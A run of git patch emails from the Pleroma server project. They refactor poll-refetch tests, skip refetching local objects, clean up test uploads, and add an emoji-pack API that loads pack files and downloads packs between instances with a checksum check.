+ on_exit(fn -> mock(fn env -> apply(HttpRequestMock, :request, [env]) end) end)
+
+ [mock_modified: mock_modified]
+ end
+
+ test "refetches if the time since the last refetch is greater than the interval", %{
+ mock_modified: mock_modified
+ } do
%Object{} =
object = Object.normalize("https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d")
assert Enum.at(object.data["oneOf"], 0)["replies"]["totalItems"] == 4
assert Enum.at(object.data["oneOf"], 1)["replies"]["totalItems"] == 0
- mock(fn
- %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
- %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_modified.json")}
-
- env ->
- apply(HttpRequestMock, :request, [env])
- end)
+ mock_modified.(%Tesla.Env{
+ status: 200,
+ body: File.read!("test/fixtures/tesla_mock/poll_modified.json")
+ })
updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: -1)
assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 8
assert Enum.at(updated_object.data["oneOf"], 1)["replies"]["totalItems"] == 3
end
- test "returns the old object if refetch fails" do
- mock(fn
- %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
- %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_original.json")}
-
- env ->
- apply(HttpRequestMock, :request, [env])
- end)
-
+ test "returns the old object if refetch fails", %{mock_modified: mock_modified} do
%Object{} =
object = Object.normalize("https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d")
@@ -136,16 +145,7 @@ test "returns the old object if refetch fails" do
assert Enum.at(object.data["oneOf"], 1)["replies"]["totalItems"] == 0
assert capture_log(fn ->
- mock(fn
- %{
- method: :get,
- url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"
- } ->
- %Tesla.Env{status: 404, body: ""}
-
- env ->
- apply(HttpRequestMock, :request, [env])
- end)
+ mock_modified.(%Tesla.Env{status: 404, body: ""})
updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: -1)
assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 4
@@ -154,32 +154,48 @@ test "returns the old object if refetch fails" do
"[error] Couldn't refresh https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"
end
- test "does not refetch if the time since the last refetch is greater than the interval" do
- mock(fn
- %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
- %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_original.json")}
-
- env ->
- apply(HttpRequestMock, :request, [env])
- end)
-
+ test "does not refetch if the time since the last refetch is greater than the interval", %{
+ mock_modified: mock_modified
+ } do
%Object{} =
object = Object.normalize("https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d")
assert Enum.at(object.data["oneOf"], 0)["replies"]["totalItems"] == 4
assert Enum.at(object.data["oneOf"], 1)["replies"]["totalItems"] == 0
- mock(fn
- %{method: :get, url: "https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d"} ->
- %Tesla.Env{status: 200, body: File.read!("test/fixtures/tesla_mock/poll_modified.json")}
-
- env ->
- apply(HttpRequestMock, :request, [env])
- end)
+ mock_modified.(%Tesla.Env{
+ status: 200,
+ body: File.read!("test/fixtures/tesla_mock/poll_modified.json")
+ })
updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: 100)
assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 4
assert Enum.at(updated_object.data["oneOf"], 1)["replies"]["totalItems"] == 0
end
+
+ test "preserves internal fields on refetch", %{mock_modified: mock_modified} do
+ %Object{} =
+ object = Object.normalize("https://patch.cx/objects/9a172665-2bc5-452d-8428-2361d4c33b1d")
+
+ assert Enum.at(object.data["oneOf"], 0)["replies"]["totalItems"] == 4
+ assert Enum.at(object.data["oneOf"], 1)["replies"]["totalItems"] == 0
+
+ user = insert(:user)
+ activity = Activity.get_create_by_object_ap_id(object.data["id"])
+ {:ok, _activity, object} = CommonAPI.favorite(activity.id, user)
+
+ assert object.data["like_count"] == 1
+
+ mock_modified.(%Tesla.Env{
+ status: 200,
+ body: File.read!("test/fixtures/tesla_mock/poll_modified.json")
+ })
+
+ updated_object = Object.get_by_id_and_maybe_refetch(object.id, interval: -1)
+ assert Enum.at(updated_object.data["oneOf"], 0)["replies"]["totalItems"] == 8
+ assert Enum.at(updated_object.data["oneOf"], 1)["replies"]["totalItems"] == 3
+
+ assert updated_object.data["like_count"] == 1
+ end
end
end
From c096dd86e5e4e3bdb9aa35c2c4f499efc17ddd16 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 19:59:23 +0300
Subject: [PATCH 128/272] Do not refetch local objects
---
lib/pleroma/object/fetcher.ex | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/object/fetcher.ex b/lib/pleroma/object/fetcher.ex
index fecc97c5e..91e6b6dca 100644
--- a/lib/pleroma/object/fetcher.ex
+++ b/lib/pleroma/object/fetcher.ex
@@ -48,10 +48,12 @@ defp reinject_object(struct, data) do
end
def refetch_object(%Object{data: %{"id" => id}} = object) do
- with {:ok, data} <- fetch_and_contain_remote_object_from_id(id),
+ with {:local, false} <- {:local, String.starts_with?(id, Pleroma.Web.base_url() <> "/")},
+ {:ok, data} <- fetch_and_contain_remote_object_from_id(id),
{:ok, object} <- reinject_object(object, data) do
{:ok, object}
else
+ {:local, true} -> object
e -> {:error, e}
end
end
From 5028b7b5780fbfd0904b2e48c05a05eeab0e623d Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 22:09:03 +0300
Subject: [PATCH 129/272] Fix credo issues
---
lib/pleroma/object/fetcher.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/object/fetcher.ex b/lib/pleroma/object/fetcher.ex
index 91e6b6dca..cea33b5af 100644
--- a/lib/pleroma/object/fetcher.ex
+++ b/lib/pleroma/object/fetcher.ex
@@ -6,8 +6,8 @@ defmodule Pleroma.Object.Fetcher do
alias Pleroma.HTTP
alias Pleroma.Object
alias Pleroma.Object.Containment
- alias Pleroma.Signature
alias Pleroma.Repo
+ alias Pleroma.Signature
alias Pleroma.Web.ActivityPub.InternalFetchActor
alias Pleroma.Web.ActivityPub.Transmogrifier
alias Pleroma.Web.OStatus
From a12aeb09c42f1c120b78d517cfbad2fe29c88006 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Wed, 18 Sep 2019 23:34:13 +0300
Subject: [PATCH 130/272] Cleanup uploads after the tests are finished
---
test/test_helper.exs | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/test/test_helper.exs b/test/test_helper.exs
index a927b2c3d..6a389365f 100644
--- a/test/test_helper.exs
+++ b/test/test_helper.exs
@@ -7,3 +7,8 @@
Ecto.Adapters.SQL.Sandbox.mode(Pleroma.Repo, :manual)
Mox.defmock(Pleroma.ReverseProxy.ClientMock, for: Pleroma.ReverseProxy.Client)
{:ok, _} = Application.ensure_all_started(:ex_machina)
+
+ExUnit.after_suite(fn _results ->
+ uploads = Pleroma.Config.get([Pleroma.Uploaders.Local, :uploads], "test/uploads")
+ File.rm_rf!(uploads)
+end)
From a22b87b30c8bf5a28465c732ac77c70631ddc4d9 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Thu, 19 Sep 2019 00:00:05 +0300
Subject: [PATCH 131/272] Add a changelog entry for poll refetching
---
CHANGELOG.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index f3f38b817..6a49bc4dd 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,8 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
## [Unreleased]
+### Added
+- Refreshing poll results for remote polls
### Changed
- **Breaking:** Elixir >=1.8 is now required (was >= 1.7)
- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
From 6a42641b8d806f40f697303995fb12af39a93bd8 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Sat, 10 Aug 2019 21:46:36 +0300
Subject: [PATCH 132/272] Add pack.toml loading
---
lib/pleroma/emoji.ex | 41 ++++++++++++++++++++++++++++-------------
mix.exs | 1 +
mix.lock | 1 +
3 files changed, 30 insertions(+), 13 deletions(-)
diff --git a/lib/pleroma/emoji.ex b/lib/pleroma/emoji.ex
index 66e20f0e4..ede734a53 100644
--- a/lib/pleroma/emoji.ex
+++ b/lib/pleroma/emoji.ex
@@ -143,23 +143,38 @@ defp load do
defp load_pack(pack_dir, emoji_groups) do
pack_name = Path.basename(pack_dir)
- emoji_txt = Path.join(pack_dir, "emoji.txt")
+ pack_toml = Path.join(pack_dir, "pack.toml")
- if File.exists?(emoji_txt) do
- load_from_file(emoji_txt, emoji_groups)
- else
- extensions = Pleroma.Config.get([:emoji, :pack_extensions])
+ if File.exists?(pack_toml) do
+ toml = Toml.decode_file!(pack_toml)
- Logger.info(
- "No emoji.txt found for pack \"#{pack_name}\", assuming all #{Enum.join(extensions, ", ")} files are emoji"
- )
-
- make_shortcode_to_file_map(pack_dir, extensions)
- |> Enum.map(fn {shortcode, rel_file} ->
+ toml["files"]
+ |> Enum.map(fn {name, rel_file} ->
filename = Path.join("/emoji/#{pack_name}", rel_file)
-
- {shortcode, filename, [to_string(match_extra(emoji_groups, filename))]}
+ {name, filename, pack_name}
end)
+ else
+ # Load from emoji.txt / all files
+ emoji_txt = Path.join(pack_dir, "emoji.txt")
+
+ if File.exists?(emoji_txt) do
+ load_from_file(emoji_txt, emoji_groups)
+ else
+ extensions = Pleroma.Config.get([:emoji, :pack_extensions])
+
+ Logger.info(
+ "No emoji.txt found for pack \"#{pack_name}\", assuming all #{
+ Enum.join(extensions, ", ")
+ } files are emoji"
+ )
+
+ make_shortcode_to_file_map(pack_dir, extensions)
+ |> Enum.map(fn {shortcode, rel_file} ->
+ filename = Path.join("/emoji/#{pack_name}", rel_file)
+
+ {shortcode, filename, [to_string(match_extra(emoji_groups, filename))]}
+ end)
+ end
end
end
diff --git a/mix.exs b/mix.exs
index f2635da24..172f3a940 100644
--- a/mix.exs
+++ b/mix.exs
@@ -157,6 +157,7 @@ defp deps do
{:ex_rated, "~> 1.3"},
{:ex_const, "~> 0.2"},
{:plug_static_index_html, "~> 1.0.0"},
+ {:toml, "~> 0.5"},
{:excoveralls, "~> 0.11.1", only: :test},
{:mox, "~> 0.5", only: :test}
] ++ oauth_deps()
diff --git a/mix.lock b/mix.lock
index 24b34c09c..39b9fa930 100644
--- a/mix.lock
+++ b/mix.lock
@@ -92,6 +92,7 @@
"telemetry": {:hex, :telemetry, "0.4.0", "8339bee3fa8b91cb84d14c2935f8ecf399ccd87301ad6da6b71c09553834b2ab", [:rebar3], [], "hexpm"},
"tesla": {:hex, :tesla, "1.3.0", "f35d72f029e608f9cdc6f6d6fcc7c66cf6d6512a70cfef9206b21b8bd0203a30", [:mix], [{:castore, "~> 0.1", [hex: :castore, repo: "hexpm", optional: true]}, {:exjsx, ">= 3.0.0", [hex: :exjsx, repo: "hexpm", optional: true]}, {:fuse, "~> 2.4", [hex: :fuse, repo: "hexpm", optional: true]}, {:gun, "~> 1.3", [hex: :gun, repo: "hexpm", optional: true]}, {:hackney, "~> 1.6", [hex: :hackney, repo: "hexpm", optional: true]}, {:ibrowse, "~> 4.4.0", [hex: :ibrowse, repo: "hexpm", optional: true]}, {:jason, ">= 1.0.0", [hex: :jason, repo: "hexpm", optional: true]}, {:mime, "~> 1.0", [hex: :mime, repo: "hexpm", optional: false]}, {:mint, "~> 0.4", [hex: :mint, repo: "hexpm", optional: true]}, {:poison, ">= 1.0.0", [hex: :poison, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.3", [hex: :telemetry, repo: "hexpm", optional: true]}], "hexpm"},
"timex": {:hex, :timex, "3.6.1", "efdf56d0e67a6b956cc57774353b0329c8ab7726766a11547e529357ffdc1d56", [:mix], [{:combine, "~> 0.10", [hex: :combine, repo: "hexpm", optional: false]}, {:gettext, "~> 0.10", [hex: :gettext, repo: "hexpm", optional: false]}, {:tzdata, "~> 0.1.8 or ~> 0.5 or ~> 1.0.0", [hex: :tzdata, repo: "hexpm", optional: false]}], "hexpm"},
+ "toml": {:hex, :toml, "0.5.2", "e471388a8726d1ce51a6b32f864b8228a1eb8edc907a0edf2bb50eab9321b526", [:mix], [], "hexpm"},
"trailing_format_plug": {:hex, :trailing_format_plug, "0.0.7", "64b877f912cf7273bed03379936df39894149e35137ac9509117e59866e10e45", [:mix], [{:plug, "> 0.12.0", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"tzdata": {:hex, :tzdata, "0.5.21", "8cbf3607fcce69636c672d5be2bbb08687fe26639a62bdcc283d267277db7cf0", [:mix], [{:hackney, "~> 1.0", [hex: :hackney, repo: "hexpm", optional: false]}], "hexpm"},
"ueberauth": {:hex, :ueberauth, "0.6.1", "9e90d3337dddf38b1ca2753aca9b1e53d8a52b890191cdc55240247c89230412", [:mix], [{:plug, "~> 1.5", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
From b791a0865641eb8210380e22e04a9fb680a79dcb Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Sun, 11 Aug 2019 00:39:21 +0300
Subject: [PATCH 133/272] Implement API actions on packs
That incldues listing them and downloading them from other instances
or from the remote url
---
.../web/emoji_api/emoji_api_controller.ex | 171 ++++++++++++++++++
lib/pleroma/web/router.ex | 22 +++
2 files changed, 193 insertions(+)
create mode 100644 lib/pleroma/web/emoji_api/emoji_api_controller.ex
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
new file mode 100644
index 000000000..49d671518
--- /dev/null
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -0,0 +1,171 @@
+defmodule Pleroma.Web.EmojiAPI.EmojiAPIController do
+ use Pleroma.Web, :controller
+
+ def reload(conn, _params) do
+ Pleroma.Emoji.reload()
+
+ conn |> json("ok")
+ end
+
+ @emoji_dir_path Path.join(
+ Pleroma.Config.get!([:instance, :static_dir]),
+ "emoji"
+ )
+
+ def list_packs(conn, _params) do
+ pack_infos =
+ case File.ls(@emoji_dir_path) do
+ {:error, _} ->
+ %{}
+
+ {:ok, results} ->
+ results
+ |> Enum.filter(fn file ->
+ dir_path = Path.join(@emoji_dir_path, file)
+ # Filter to only use the pack.toml packs
+ File.dir?(dir_path) and File.exists?(Path.join(dir_path, "pack.toml"))
+ end)
+ |> Enum.map(fn pack_name ->
+ pack_path = Path.join(@emoji_dir_path, pack_name)
+ pack_file = Path.join(pack_path, "pack.toml")
+
+ {pack_name, Toml.decode_file!(pack_file)}
+ end)
+ # Transform into a map of pack-name => pack-data
+ # Check if all the files are in place and can be sent
+ |> Enum.map(fn {name, pack} ->
+ pack_path = Path.join(@emoji_dir_path, name)
+
+ archive_for_sha = make_archive(name, pack, pack_path)
+ archive_sha = :crypto.hash(:sha256, archive_for_sha) |> Base.encode16()
+
+ {name,
+ pack
+ |> put_in(["pack", "can-download"], can_download?(pack, pack_path))
+ |> put_in(["pack", "download-sha256"], archive_sha)}
+ end)
+ |> Enum.into(%{})
+ end
+
+ conn |> json(pack_infos)
+ end
+
+ defp can_download?(pack, pack_path) do
+ # If the pack is set as shared, check if it can be downloaded
+ # That means that when asked, the pack can be packed and sent to the remote
+ # Otherwise, they'd have to download it from external-src
+ pack["pack"]["share-files"] and
+ Enum.all?(pack["files"], fn {_, path} ->
+ File.exists?(Path.join(pack_path, path))
+ end)
+ end
+
+ defp make_archive(name, pack, pack_dir) do
+ files =
+ ['pack.toml'] ++
+ (pack["files"] |> Enum.map(fn {_, path} -> to_charlist(path) end))
+
+ {:ok, {_, zip_result}} = :zip.zip('#{name}.zip', files, [:memory, cwd: to_charlist(pack_dir)])
+
+ zip_result
+ end
+
+ def download_shared(conn, %{"name" => name}) do
+ pack_dir = Path.join(@emoji_dir_path, name)
+ pack_toml = Path.join(pack_dir, "pack.toml")
+
+ if File.exists?(pack_toml) do
+ pack = Toml.decode_file!(pack_toml)
+
+ if can_download?(pack, pack_dir) do
+ zip_result = make_archive(name, pack, pack_dir)
+
+ conn
+ |> send_download({:binary, zip_result}, filename: "#{name}.zip")
+ else
+ {:error,
+ conn
+ |> put_status(:forbidden)
+ |> json("Pack #{name} cannot be downloaded from this instance, either pack sharing\
+ was disabled for this pack or some files are missing")}
+ end
+ else
+ {:error,
+ conn
+ |> put_status(:not_found)
+ |> json("Pack #{name} does not exist")}
+ end
+ end
+
+ def download_from(conn, %{"instance_address" => address, "pack_name" => name} = data) do
+ list_uri = "#{address}/api/pleroma/emoji/packs/list"
+
+ list = Tesla.get!(list_uri).body |> Jason.decode!()
+ full_pack = list[name]
+ pfiles = full_pack["files"]
+ pack = full_pack["pack"]
+
+ pack_info_res =
+ cond do
+ pack["share-files"] && pack["can-download"] ->
+ {:ok,
+ %{
+ sha: pack["download-sha256"],
+ uri: "#{address}/api/pleroma/emoji/packs/download_shared/#{name}"
+ }}
+
+ pack["fallback-src"] ->
+ {:ok,
+ %{
+ sha: pack["fallback-src-sha256"],
+ uri: pack["fallback-src"],
+ fallback: true
+ }}
+
+ true ->
+ {:error, "The pack was not set as shared and the is no fallback url to download from"}
+ end
+
+ case pack_info_res do
+ {:ok, %{sha: sha, uri: uri} = pinfo} ->
+ sha = Base.decode16!(sha)
+ emoji_archive = Tesla.get!(uri).body
+
+ got_sha = :crypto.hash(:sha256, emoji_archive)
+
+ if got_sha == sha do
+ local_name = data["as"] || name
+ pack_dir = Path.join(@emoji_dir_path, local_name)
+ File.mkdir_p!(pack_dir)
+
+ files =
+ ['pack.toml'] ++
+ (pfiles |> Enum.map(fn {_, path} -> to_charlist(path) end))
+
+ {:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
+
+ # Fallback URL might not contain a pack.toml file, if that happens - fail (for now)
+ # FIXME: there seems to be a lack of any kind of encoders besides JSON.
+ erres =
+ if pinfo[:fallback] do
+ toml_path = Path.join(pack_dir, "pack.toml")
+
+ unless File.exists?(toml_path) do
+ conn
+ |> put_status(:internal_server_error)
+ |> text("No pack.toml in falblack source")
+ end
+ end
+
+ if not is_nil(erres), do: erres, else: conn |> text("ok")
+ else
+ conn
+ |> put_status(:internal_server_error)
+ |> text("SHA256 for the pack doesn't match the one sent by the server")
+ end
+
+ {:error, e} ->
+ conn |> put_status(:internal_server_error) |> text(e)
+ end
+ end
+end
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index b9b85fd67..514446fb3 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -207,6 +207,28 @@ defmodule Pleroma.Web.Router do
get("/moderation_log", AdminAPIController, :list_log)
end
+ scope "/api/pleroma/emoji", Pleroma.Web.EmojiAPI do
+ scope [] do
+ pipe_through([:admin_api, :oauth_write])
+
+ post("/reload", EmojiAPIController, :reload)
+ end
+
+ scope "/packs" do
+ # Modifying packs
+ pipe_through([:admin_api, :oauth_write])
+
+ post("/download_from", EmojiAPIController, :download_from)
+ end
+
+ scope "/packs" do
+ # Pack info / downloading
+ get("/list", EmojiAPIController, :list_packs)
+ get("/download_shared/:name", EmojiAPIController, :download_shared)
+ get("/sha_of_shared/:name", EmojiAPIController, :sha_of_shared)
+ end
+ end
+
scope "/", Pleroma.Web.TwitterAPI do
pipe_through(:pleroma_html)
From 54b8e683bce13cf67f2674ea9f56b30604b28358 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Sun, 11 Aug 2019 22:32:15 +0300
Subject: [PATCH 134/272] Swap TOML for YAML to get YAML generation for packs
from fallbacks
If fallback url doesn't have a pack.yml file, one from the source will
be used
---
lib/pleroma/emoji.ex | 8 ++---
.../web/emoji_api/emoji_api_controller.ex | 36 +++++++++----------
lib/pleroma/web/router.ex | 1 -
mix.exs | 2 +-
mix.lock | 3 +-
5 files changed, 23 insertions(+), 27 deletions(-)
diff --git a/lib/pleroma/emoji.ex b/lib/pleroma/emoji.ex
index ede734a53..2a9f5f804 100644
--- a/lib/pleroma/emoji.ex
+++ b/lib/pleroma/emoji.ex
@@ -143,12 +143,12 @@ defp load do
defp load_pack(pack_dir, emoji_groups) do
pack_name = Path.basename(pack_dir)
- pack_toml = Path.join(pack_dir, "pack.toml")
+ pack_yaml = Path.join(pack_dir, "pack.yml")
- if File.exists?(pack_toml) do
- toml = Toml.decode_file!(pack_toml)
+ if File.exists?(pack_yaml) do
+ yaml = RelaxYaml.Decoder.read_from_file(pack_yaml)
- toml["files"]
+ yaml["files"]
|> Enum.map(fn {name, rel_file} ->
filename = Path.join("/emoji/#{pack_name}", rel_file)
{name, filename, pack_name}
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 49d671518..7ef9b543d 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -22,14 +22,14 @@ def list_packs(conn, _params) do
results
|> Enum.filter(fn file ->
dir_path = Path.join(@emoji_dir_path, file)
- # Filter to only use the pack.toml packs
- File.dir?(dir_path) and File.exists?(Path.join(dir_path, "pack.toml"))
+ # Filter to only use the pack.yml packs
+ File.dir?(dir_path) and File.exists?(Path.join(dir_path, "pack.yml"))
end)
|> Enum.map(fn pack_name ->
pack_path = Path.join(@emoji_dir_path, pack_name)
- pack_file = Path.join(pack_path, "pack.toml")
+ pack_file = Path.join(pack_path, "pack.yml")
- {pack_name, Toml.decode_file!(pack_file)}
+ {pack_name, RelaxYaml.Decoder.read_from_file(pack_file)}
end)
# Transform into a map of pack-name => pack-data
# Check if all the files are in place and can be sent
@@ -62,7 +62,7 @@ defp can_download?(pack, pack_path) do
defp make_archive(name, pack, pack_dir) do
files =
- ['pack.toml'] ++
+ ['pack.yml'] ++
(pack["files"] |> Enum.map(fn {_, path} -> to_charlist(path) end))
{:ok, {_, zip_result}} = :zip.zip('#{name}.zip', files, [:memory, cwd: to_charlist(pack_dir)])
@@ -72,10 +72,10 @@ defp make_archive(name, pack, pack_dir) do
def download_shared(conn, %{"name" => name}) do
pack_dir = Path.join(@emoji_dir_path, name)
- pack_toml = Path.join(pack_dir, "pack.toml")
+ pack_yaml = Path.join(pack_dir, "pack.yml")
- if File.exists?(pack_toml) do
- pack = Toml.decode_file!(pack_toml)
+ if File.exists?(pack_yaml) do
+ pack = RelaxYaml.Decoder.read_from_file(pack_yaml)
if can_download?(pack, pack_dir) do
zip_result = make_archive(name, pack, pack_dir)
@@ -139,25 +139,21 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
File.mkdir_p!(pack_dir)
files =
- ['pack.toml'] ++
+ ['pack.yml'] ++
(pfiles |> Enum.map(fn {_, path} -> to_charlist(path) end))
{:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
- # Fallback URL might not contain a pack.toml file, if that happens - fail (for now)
- # FIXME: there seems to be a lack of any kind of encoders besides JSON.
- erres =
- if pinfo[:fallback] do
- toml_path = Path.join(pack_dir, "pack.toml")
+ # Fallback URL might not contain a pack.yml file. Put on we have if there's none
+ if pinfo[:fallback] do
+ yaml_path = Path.join(pack_dir, "pack.yml")
- unless File.exists?(toml_path) do
- conn
- |> put_status(:internal_server_error)
- |> text("No pack.toml in falblack source")
- end
+ unless File.exists?(yaml_path) do
+ File.write!(yaml_path, RelaxYaml.Encoder.encode(full_pack, []))
end
+ end
- if not is_nil(erres), do: erres, else: conn |> text("ok")
+ conn |> text("ok")
else
conn
|> put_status(:internal_server_error)
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 514446fb3..1c781d750 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -225,7 +225,6 @@ defmodule Pleroma.Web.Router do
# Pack info / downloading
get("/list", EmojiAPIController, :list_packs)
get("/download_shared/:name", EmojiAPIController, :download_shared)
- get("/sha_of_shared/:name", EmojiAPIController, :sha_of_shared)
end
end
diff --git a/mix.exs b/mix.exs
index 172f3a940..e8356d564 100644
--- a/mix.exs
+++ b/mix.exs
@@ -157,7 +157,7 @@ defp deps do
{:ex_rated, "~> 1.3"},
{:ex_const, "~> 0.2"},
{:plug_static_index_html, "~> 1.0.0"},
- {:toml, "~> 0.5"},
+ {:relax_yaml, "~> 0.1"},
{:excoveralls, "~> 0.11.1", only: :test},
{:mox, "~> 0.5", only: :test}
] ++ oauth_deps()
diff --git a/mix.lock b/mix.lock
index 39b9fa930..8852b5f65 100644
--- a/mix.lock
+++ b/mix.lock
@@ -84,6 +84,7 @@
"quantum": {:hex, :quantum, "2.3.4", "72a0e8855e2adc101459eac8454787cb74ab4169de6ca50f670e72142d4960e9", [:mix], [{:calendar, "~> 0.17", [hex: :calendar, repo: "hexpm", optional: true]}, {:crontab, "~> 1.1", [hex: :crontab, repo: "hexpm", optional: false]}, {:gen_stage, "~> 0.12", [hex: :gen_stage, repo: "hexpm", optional: false]}, {:swarm, "~> 3.3", [hex: :swarm, repo: "hexpm", optional: false]}, {:timex, "~> 3.1", [hex: :timex, repo: "hexpm", optional: true]}], "hexpm"},
"ranch": {:hex, :ranch, "1.7.1", "6b1fab51b49196860b733a49c07604465a47bdb78aa10c1c16a3d199f7f8c881", [:rebar3], [], "hexpm"},
"recon": {:git, "https://github.com/ferd/recon.git", "75d70c7c08926d2f24f1ee6de14ee50fe8a52763", [tag: "2.4.0"]},
+ "relax_yaml": {:hex, :relax_yaml, "0.1.4", "99e55ae80b3bd1135f4288e1ba77b816ad7de05bcb4618a1a9f983ce7c89ff32", [:mix], [{:yamerl, "~> 0.4.0", [hex: :yamerl, repo: "hexpm", optional: false]}], "hexpm"},
"ssl_verify_fun": {:hex, :ssl_verify_fun, "1.1.4", "f0eafff810d2041e93f915ef59899c923f4568f4585904d010387ed74988e77b", [:make, :mix, :rebar3], [], "hexpm"},
"swarm": {:hex, :swarm, "3.4.0", "64f8b30055d74640d2186c66354b33b999438692a91be275bb89cdc7e401f448", [:mix], [{:gen_state_machine, "~> 2.0", [hex: :gen_state_machine, repo: "hexpm", optional: false]}, {:libring, "~> 1.0", [hex: :libring, repo: "hexpm", optional: false]}], "hexpm"},
"sweet_xml": {:hex, :sweet_xml, "0.6.6", "fc3e91ec5dd7c787b6195757fbcf0abc670cee1e4172687b45183032221b66b8", [:mix], [], "hexpm"},
@@ -92,7 +93,6 @@
"telemetry": {:hex, :telemetry, "0.4.0", "8339bee3fa8b91cb84d14c2935f8ecf399ccd87301ad6da6b71c09553834b2ab", [:rebar3], [], "hexpm"},
"tesla": {:hex, :tesla, "1.3.0", "f35d72f029e608f9cdc6f6d6fcc7c66cf6d6512a70cfef9206b21b8bd0203a30", [:mix], [{:castore, "~> 0.1", [hex: :castore, repo: "hexpm", optional: true]}, {:exjsx, ">= 3.0.0", [hex: :exjsx, repo: "hexpm", optional: true]}, {:fuse, "~> 2.4", [hex: :fuse, repo: "hexpm", optional: true]}, {:gun, "~> 1.3", [hex: :gun, repo: "hexpm", optional: true]}, {:hackney, "~> 1.6", [hex: :hackney, repo: "hexpm", optional: true]}, {:ibrowse, "~> 4.4.0", [hex: :ibrowse, repo: "hexpm", optional: true]}, {:jason, ">= 1.0.0", [hex: :jason, repo: "hexpm", optional: true]}, {:mime, "~> 1.0", [hex: :mime, repo: "hexpm", optional: false]}, {:mint, "~> 0.4", [hex: :mint, repo: "hexpm", optional: true]}, {:poison, ">= 1.0.0", [hex: :poison, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.3", [hex: :telemetry, repo: "hexpm", optional: true]}], "hexpm"},
"timex": {:hex, :timex, "3.6.1", "efdf56d0e67a6b956cc57774353b0329c8ab7726766a11547e529357ffdc1d56", [:mix], [{:combine, "~> 0.10", [hex: :combine, repo: "hexpm", optional: false]}, {:gettext, "~> 0.10", [hex: :gettext, repo: "hexpm", optional: false]}, {:tzdata, "~> 0.1.8 or ~> 0.5 or ~> 1.0.0", [hex: :tzdata, repo: "hexpm", optional: false]}], "hexpm"},
- "toml": {:hex, :toml, "0.5.2", "e471388a8726d1ce51a6b32f864b8228a1eb8edc907a0edf2bb50eab9321b526", [:mix], [], "hexpm"},
"trailing_format_plug": {:hex, :trailing_format_plug, "0.0.7", "64b877f912cf7273bed03379936df39894149e35137ac9509117e59866e10e45", [:mix], [{:plug, "> 0.12.0", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"tzdata": {:hex, :tzdata, "0.5.21", "8cbf3607fcce69636c672d5be2bbb08687fe26639a62bdcc283d267277db7cf0", [:mix], [{:hackney, "~> 1.0", [hex: :hackney, repo: "hexpm", optional: false]}], "hexpm"},
"ueberauth": {:hex, :ueberauth, "0.6.1", "9e90d3337dddf38b1ca2753aca9b1e53d8a52b890191cdc55240247c89230412", [:mix], [{:plug, "~> 1.5", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
@@ -100,4 +100,5 @@
"unsafe": {:hex, :unsafe, "1.0.1", "a27e1874f72ee49312e0a9ec2e0b27924214a05e3ddac90e91727bc76f8613d8", [:mix], [], "hexpm"},
